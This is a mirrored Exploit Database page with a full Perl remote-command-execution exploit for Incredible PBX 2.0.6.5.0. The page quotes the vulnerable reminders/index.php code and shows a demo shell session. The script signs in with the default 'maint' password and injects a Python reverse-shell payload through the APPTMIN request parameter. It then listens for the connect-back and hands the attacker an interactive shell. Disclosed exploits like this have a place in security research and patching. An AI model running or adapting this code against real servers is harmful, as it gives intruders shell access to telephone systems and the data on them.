Incredible PBX 2.0.6.5.0 – Remote Command Execution

• Exploit Database
• 123 阅读

• 作者： Simo Ben Youssef
  日期： 2014-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35080/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187

  #!/usr/bin/perl # # Title: Incredible PBX remote command execution exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered: 1 September 2014 # Coded: 21 October 2014 # Published: 21 October 2014 # MorXploit Research # http://www.MorXploit.com # Vendor: PBX in a Flash # Vendor url: http://pbxinaflash.net/ # Software: Incredible PBX 11 # Version: 2.0.6.5.0 # Product url: http://incrediblepbx.com/ # Vulnerable file: reminders/index.php # # About (from their website): # Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the # ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk # utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice. # # Description: # reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to # inject commands as the asterisk user. # # Vulnerable code: # 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm"); # 472: $tmpwave = "/tmp/$token.wav"; # 469: $token = md5(uniqid("")); # 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm"; # 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME); # 375: $APPTTIME = $_REQUEST[&apos;APPTHR&apos;] . $_REQUEST[&apos;APPTMIN&apos;]; # 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT); # 374: $APPTDT = $_REQUEST[&apos;APPTYR&apos;] . $_REQUEST[&apos;APPTMO&apos;] . $_REQUEST[&apos;APPTDA&apos;]; # 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE); # 376: $APPTPHONE = $_REQUEST[&apos;APPTPHONE&apos;]; # # As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system(); # # Exploit: # As PoC, the below perl code will try to exploit $_REQUEST[&apos;APPTMIN&apos;] to inject a python connect back shell. # # Note: # Access to reminders/index.php requires &apos;maint&apos; password, in the exploit code we have used the default installation password which is # &apos;password&apos;. # # Demo: # ==================================================== # --- Incredible PBX remote command execution exploit # --- By: Simo Ben youssef <simo_at_morxploit_com> # --- MorXploit Research www.MorXploit.com # ==================================================== # [*] MorXploiting http://10.0.0.20/reminders/index.php # [+] Sent payload! Waiting for connect back shell ... # sh: no job control in this shell # sh-4.1$ id; cat /etc/issue # id; cat /etc/issue # uid=498(asterisk) gid=497(asterisk) groups=497(asterisk) # CentOS release 6.5 (Custom) on \m # Welcome to PBX in a Flash - Green # Please log in to continue # ****************************************** # Your IP Address is: # # 10.0.0.20 # ****************************************** # # Download: # http://www.morxploit.com/morxploits/morxincpbx.pl # # Requires LWP::UserAgent # apt-get install libwww-perl # yum install libwww-perl # perl -MCPAN -e &apos;install Bundle::LWP&apos; # For SSL support: # apt-get install liblwp-protocol-https-perl # yum install perl-Crypt-SSLeay # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use or damage. Use at your own risk.   use LWP::UserAgent; use MIME::Base64; use IO::Socket; use strict;   sub banner { system(($^O eq &apos;MSWin32&apos;) ? &apos;cls&apos; : &apos;clear&apos;); print "====================================================\n"; print "--- Incredible PBX remote command execution exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "====================================================\n"; }   if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) { banner(); print "perl $0 <target> <connectbackIP> <connectbackport>\n"; print "perl $0 http://10.0.0.16 10.0.0.2 31337\n"; exit; }   my $host = $ARGV[0]; my $vuln = "reminders/index.php"; my $cbhost = $ARGV[1]; my $cbport = $ARGV[2]; my $defuser = "maint"; # Default maint user my $defpass = "password"; # Default maint pass my $string = "$defuser:$defpass"; my $host2 = "http://localhost:81"; my $encoded = encode_base64($string); $| = 1; $SIG{CHLD} = &apos;IGNORE&apos;;   my $l_sock = IO::Socket::INET->new( Proto => "tcp", LocalPort => "$cbport", Listen => 1, LocalAddr => "0.0.0.0", Reuse => 1, ) or die "[-] Could not listen on $cbport: $!\n";   sub randomagent { my @array = (&apos;Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0&apos;, &apos;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0&apos;, &apos;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)&apos;, &apos;Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36&apos;, &apos;Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36&apos;, &apos;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31&apos; ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent();   my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded"); unless ($status->is_success) { banner(); print "[-] Error: " . $status->status_line . "\n"; exit; }   banner(); print "[*] MorXploiting $host/$vuln\n";   my $payload = "python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);&apos;"; my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx"; my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded"); print "[+] Sent payload! Waiting for connect back root shell ...\n";   my $a_sock = $l_sock->accept(); $l_sock->shutdown(SHUT_RDWR); copy_data_bidi($a_sock);   sub copy_data_bidi { my ($socket) = @_; my $child_pid = fork(); if (! $child_pid) { close(STDIN); copy_data_mono($socket, *STDOUT); $socket->shutdown(SHUT_RD); exit(); } else { close(STDOUT); copy_data_mono(*STDIN, $socket); $socket->shutdown(SHUT_WR); kill("TERM", $child_pid); } } sub copy_data_mono { my ($src, $dst) = @_; my $buf; while (my $read_len = sysread($src, $buf, 4096)) { my $write_len = $read_len; while ($write_len) { my $written_len = syswrite($dst, $buf); return unless $written_len; $write_len -= $written_len; } } }